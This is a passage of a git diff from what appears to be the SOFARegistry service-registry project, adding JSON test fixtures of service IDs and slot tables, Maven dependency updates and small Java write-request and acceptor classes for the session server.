lipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.disableSDKLogs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.notify.ApiNotifyRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.116.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:isdsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.redeem.AssetRedeemCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffgroup-demo-sherry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.analysis.spi.RiskCaseAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.contentdata.ContentBizSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.cryptprod.common.service.facade.CipherCertQueryFacade:1.0:@fccryptprod_service_unique_id@@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.core.service.fundcheck.query.DataQueryServiceIntlProxy:1.0:dataQueryServiceIntlProxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.prototype.ActivityAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.express.ExpressFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.152.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.ChargeResultCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmembercore.common.facade.prepaid.CardFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrmcore.common.service.facade.service.opscloud.CheckPlatformService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:appinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finquotationcenter.common.service.facade.api.CandlestickStoreFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insclaimdecision.common.service.InsDecisionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:antuiportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.144.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbposprod.common.service.facade.api.KmsStallConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.StationContactFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoinsprod.common.service.facade.policy.AutoInsPolicyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.SceneAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.239.237.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custrelation.service.facade.voucher.ShareVoucherQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.bind.MiniAppBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.MNotifyClientDAS:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msgopprod.common.service.facade.template.MsgTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.logsim.labsinglecasereplay.OeEmulatorLabSingleCaseReplayTaskDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintransfercore.common.service.facade.transfer.FinTransferOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.updateNotifyRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.credittrans.common.service.facade.api.CredittransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antprivacy.inspect.manager.RequestContextManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finconsumeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pvsofaserver:name=com.alipay.zcache.tbase.yingxutestGZTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adbasiclib.ad.facade.AdServiceFacade:1.0:gd-dsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBKNOWLEDGEGRAPH#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_MPROMO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","mappprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.common.service.integration.cifcommon.UserAgreementQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.kmi.drm.KeyCacheRefresher.keyName,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:keplerapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:file-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.callback.SceneApplyCallback:1.0:openFormManageCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.dqc.DqcRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayModeDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-yantwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.delivery.InsIopDeliveryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.SpOperatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:workflowMatterApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cmscore.common.service.facade.PackageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-redeem-execute-init.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financeprod.service.facade.TaskFlowOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-antfeaturemng-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.genericmerchant.facade.StaffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.0.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@csmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finfiprod.common.service.facade.p2p.appointment.service.AppointmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.DistrictMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.ilogin.common.service.facade.api.oauth.OAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bktrust.facade.credit.JointCreditApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.enableClientSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oasis.common.service.facade.cluster.manager.ForMonitorTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_COMPCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ibizdatabatch.biz.service.facade.api.CompatibleExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.237.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.facade.security.SecurityPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanRestructureConfigDrm.deferRepayReadSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finpwm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tradecsa.common.service.facade.wufu.WufuRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.simple.DeliverFacade:1.0:ucdpcore-finance104949@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.132.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promobench.core.flow.common.service.PromobenchRemoteManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:bizfundprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.compmng.service.facade.CompensationConsultService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.cfgriskctrl.AppRuleBlacklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.testCacheTbase.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:bababaasfb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.dtemplate.ParmTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.pointlibrary.api.PointLibraryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.workflow.common.service.facade.feedback.GlobalFeedbackManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceAsyncCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IOperationRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.media.api.MediaContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FundC6FileDisposeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.TemplateAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dt.onedata3.model.service.LogicalModelSchemaOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.NewsMaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.CtuEventQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.LotteryRecordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.QuotationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.FeatureDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.167.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.core.config.cache.service.MandatoryRedemptionCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalproxyquery:name=com.alipay.anthubble.proxy.sla.AntHubbleSla.totalSlaLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.decisionx.engine.common.api.VerifyService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.GroupFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DowngradeSwitchConfig.skipRulePkgStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmodelpredict.common.service.facade.qualityprod.rest.PaiRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gotone.common.service.api.ReceiveCouriercoreIvrReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.153.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER"] \ No newline at end of file diff --git a/server/server/meta/src/test/resources/test/slot-table-2.json b/server/server/meta/src/test/resources/test/slot-table-2.json new file mode 100644 index 000000000..c7ed3c537 --- /dev/null +++ b/server/server/meta/src/test/resources/test/slot-table-2.json @@ -0,0 +1 @@ +{"epoch":2210229563555841,"slots":[{"id":0,"leader":"100.88.50.178","leaderEpoch":2210229464170496,"followers":["100.83.52.136"]},{"id":1,"leader":"100.88.50.178","leaderEpoch":2210229464170497,"followers":["100.83.52.136"]},{"id":2,"leader":"100.88.50.178","leaderEpoch":2210229497200640,"followers":["100.83.52.136"]},{"id":3,"leader":"100.88.50.178","leaderEpoch":2210229497233408,"followers":["100.83.52.136"]},{"id":4,"leader":"100.88.50.178","leaderEpoch":2210229530329088,"followers":["100.83.52.136"]},{"id":5,"leader":"100.88.50.178","leaderEpoch":2210229530329089,"followers":["100.83.52.136"]},{"id":6,"leader":"100.88.50.178","leaderEpoch":2210229563555840,"followers":["100.83.52.136"]},{"id":7,"leader":"100.83.52.136","leaderEpoch":2210228125499398,"followers":["100.88.50.178"]},{"id":8,"leader":"100.83.52.136","leaderEpoch":2210228125499399,"followers":["100.88.50.178"]},{"id":9,"leader":"100.83.52.136","leaderEpoch":2210228125499400,"followers":["100.88.50.178"]},{"id":10,"leader":"100.83.52.136","leaderEpoch":2210228125499401,"followers":["100.88.50.178"]},{"id":11,"leader":"100.83.52.136","leaderEpoch":2210228125499402,"followers":["100.88.50.178"]},{"id":12,"leader":"100.83.52.136","leaderEpoch":2210228125532160,"followers":["100.88.50.178"]},{"id":13,"leader":"100.83.52.136","leaderEpoch":2210228125532161,"followers":["100.88.50.178"]},{"id":14,"leader":"100.83.52.136","leaderEpoch":2210228125532162,"followers":["100.88.50.178"]},{"id":15,"leader":"100.83.52.136","leaderEpoch":2210228125532163,"followers":["100.88.50.178"]}],"dataServers":["100.88.50.178","100.83.52.136"]} \ No newline at end of file diff --git a/server/server/meta/src/test/resources/test/slot-table.json b/server/server/meta/src/test/resources/test/slot-table.json new file mode 100644 index 000000000..95b555037 --- /dev/null +++ b/server/server/meta/src/test/resources/test/slot-table.json @@ -0,0 +1 @@ +{"epoch":2125435718729728,"slots":[{"id":0,"leader":"100.88.142.36","leaderEpoch":2125435635171328,"followers":["100.88.142.32"]},{"id":1,"leader":"100.88.142.36","leaderEpoch":2125435635204096,"followers":["100.88.142.32"]},{"id":2,"leader":"100.88.142.36","leaderEpoch":2125435635204097,"followers":["100.88.142.32"]},{"id":3,"leader":"100.88.142.36","leaderEpoch":2125435635269632,"followers":["100.88.142.32"]},{"id":4,"leader":"100.88.142.36","leaderEpoch":2125435635269633,"followers":["100.88.142.32"]},{"id":5,"leader":"100.88.142.36","leaderEpoch":2125435635269634,"followers":["100.88.142.32"]},{"id":6,"leader":"100.88.142.36","leaderEpoch":2125435635335168,"followers":["100.88.142.32"]},{"id":7,"leader":"100.88.142.36","leaderEpoch":2125435635335169,"followers":["100.88.142.32"]},{"id":8,"leader":"100.88.142.32","leaderEpoch":2125435407171592,"followers":["100.88.142.19"]},{"id":9,"leader":"100.88.142.32","leaderEpoch":2125435407204352,"followers":["100.88.142.19"]},{"id":10,"leader":"100.88.142.32","leaderEpoch":2125435407237120,"followers":["100.88.142.19"]},{"id":11,"leader":"100.88.142.32","leaderEpoch":2125435407237121,"followers":["100.88.142.19"]},{"id":12,"leader":"100.88.142.32","leaderEpoch":2125435407237122,"followers":["100.88.142.19"]},{"id":13,"leader":"100.88.142.32","leaderEpoch":2125435407237123,"followers":["100.88.142.19"]},{"id":14,"leader":"100.88.142.32","leaderEpoch":2125435407237124,"followers":["100.88.142.19"]},{"id":15,"leader":"100.88.142.32","leaderEpoch":2125435407302656,"followers":["100.88.142.19"]}],"dataServers":["100.88.142.32","100.88.142.36","100.88.142.19"]} diff --git a/server/server/pom.xml b/server/server/pom.xml index 30a7de600..84bdcfed8 100644 --- a/server/server/pom.xml +++ b/server/server/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -22,5 +22,16 @@ data meta integration + shared + + + + com.alipay.sofa + registry-common-util + + + + + diff --git a/server/server/session/pom.xml b/server/server/session/pom.xml index 25d435d51..0126088f3 100644 --- a/server/server/session/pom.xml +++ b/server/server/session/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -18,8 +18,8 @@ - org.springframework.boot - spring-boot-starter + org.slf4j + jul-to-slf4j org.springframework.boot @@ -30,6 +30,10 @@ com.alipay.sofa registry-remoting-api + + com.alipay.sofa + registry-server-shared + com.google.guava guava @@ -58,6 +62,10 @@ com.alipay.sofa registry-remoting-http + + com.alipay.sofa + registry-server-shared + org.hibernate hibernate-validator @@ -66,14 +74,36 @@ com.google.protobuf protobuf-java + + com.alipay.sofa + registry-store-common + com.alipay.sofa registry-store-jraft + + com.alipay.sofa + registry-store-jdbc + + + mysql + mysql-connector-java + + commons-lang commons-lang + + com.github.rholder + guava-retrying + + + junit + junit + test + diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/SessionApplication.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/SessionApplication.java index be15b48ed..dbd67c0b7 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/SessionApplication.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/SessionApplication.java @@ -20,25 +20,27 @@ import com.alipay.sofa.registry.log.LoggerFactory; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; +import org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration; import org.springframework.scheduling.annotation.EnableScheduling; /** - * * @author zhuoyu.sjw * @version $Id: SessionApplication.java, v 0.1 2017-11-13 20:19 zhuoyu.sjw Exp $$ */ -@SpringBootApplication +@SpringBootApplication(exclude = {DataSourceAutoConfiguration.class}) @EnableScheduling public class SessionApplication { - private static final Logger LOGGER = LoggerFactory.getLogger(SessionApplication.class); + private static final Logger LOGGER = LoggerFactory.getLogger(SessionApplication.class); - public static void main(String[] args) { - // setup DefaultUncaughtExceptionHandler - Thread.setDefaultUncaughtExceptionHandler((t, e) -> { - LOGGER.error(String.format("UncaughtException in Thread(%s): %s", t.getName(), e.getMessage()), e); + public static void main(String[] args) { + // setup DefaultUncaughtExceptionHandler + Thread.setDefaultUncaughtExceptionHandler( + (t, e) -> { + LOGGER.error( + String.format("UncaughtException in Thread(%s): %s", t.getName(), e.getMessage()), e); }); - SpringApplication.run(SessionApplication.class, args); - } + SpringApplication.run(SessionApplication.class, args); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/ClientOffWriteDataRequest.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/ClientOffWriteDataRequest.java new file mode 100644 index 000000000..66f8c6f0e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/ClientOffWriteDataRequest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.acceptor; + +import com.alipay.sofa.registry.common.model.ClientOffPublishers; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.Publisher; +import java.util.List; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-12 15:20 yuzhi.lyz Exp $ + */ +public final class ClientOffWriteDataRequest implements WriteDataRequest { + private final ConnectId connectId; + + private final ClientOffPublishers requestBody; + + public ClientOffWriteDataRequest(ConnectId connectId, List publishers) { + this.connectId = connectId; + this.requestBody = new ClientOffPublishers(connectId, publishers); + } + + @Override + public ClientOffPublishers getRequestBody() { + return requestBody; + } + + @Override + public WriteDataRequestType getRequestType() { + return WriteDataRequestType.CLIENT_OFF; + } + + @Override + public ConnectId getConnectId() { + return connectId; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/PublisherWriteDataRequest.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/PublisherWriteDataRequest.java new file mode 100644 index 000000000..1e728d35b --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/PublisherWriteDataRequest.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.acceptor; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.Publisher; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-12 15:14 yuzhi.lyz Exp $ + */ +public final class PublisherWriteDataRequest implements WriteDataRequest { + private final Publisher publisher; + private final WriteDataRequestType type; + + public PublisherWriteDataRequest(Publisher publisher, WriteDataRequestType type) { + this.publisher = publisher; + this.type = type; + } + + @Override + public Publisher getRequestBody() { + return publisher; + } + + @Override + public WriteDataRequestType getRequestType() { + return type; + } + + @Override + public ConnectId getConnectId() { + return publisher.connectId(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataAcceptor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataAcceptor.java new file mode 100644 index 000000000..659a1169e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataAcceptor.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.acceptor; + +/** + * @author kezhu.wukz + * @author shangyu.wh + * @version 1.0: WriteDataAcceptor.java, v 0.1 2019-06-11 15:08 shangyu.wh Exp $ + */ +public interface WriteDataAcceptor { + + /** + * accept all write data request + * + * @param request + */ + void accept(WriteDataRequest request); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataAcceptorImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataAcceptorImpl.java new file mode 100644 index 000000000..f058e8970 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataAcceptorImpl.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.acceptor; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.server.session.node.service.DataNodeService; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author kezhu.wukz + * @author shangyu.wh + * @version 1.0: WriteDataAcceptor.java, v 0.1 2019-06-06 12:45 shangyu.wh Exp $ + */ +public class WriteDataAcceptorImpl implements WriteDataAcceptor { + + @Autowired DataNodeService dataNodeService; + + public void accept(WriteDataRequest request) { + ConnectId connectId = request.getConnectId(); + WriteDataProcessor writeDataProcessor = new WriteDataProcessor(connectId, dataNodeService); + writeDataProcessor.process(request); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataProcessor.java new file mode 100644 index 000000000..d420938a5 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/acceptor/WriteDataProcessor.java @@ -0,0 +1,77 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.acceptor; + +import com.alipay.sofa.registry.common.model.ConnectId; +import 